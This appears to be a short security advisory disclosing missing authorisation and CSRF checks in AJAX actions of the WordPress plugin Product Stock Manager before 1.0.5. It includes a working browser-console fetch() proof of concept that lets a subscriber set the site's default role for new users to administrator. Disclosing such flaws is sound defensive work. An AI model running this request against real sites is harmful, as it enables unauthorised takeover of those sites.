Product Stock Manager < 1.0.5 - Subscriber+ Unauthorised AJAX Calls

The plugin does not have authorisation and proper CSRF checks in multiple AJAX actions, allowing users with a role as low as subscriber to call them. One action in particular could allow to update arbitrary options

PoC

To set the default role for new users to administrator, run the below command in the developer console of the web browser while being logged on the blog as a subscriber user fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: ‘action=af_sm_set_checkbox_status&name;=default_role&checkbox;_status=administrator’, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));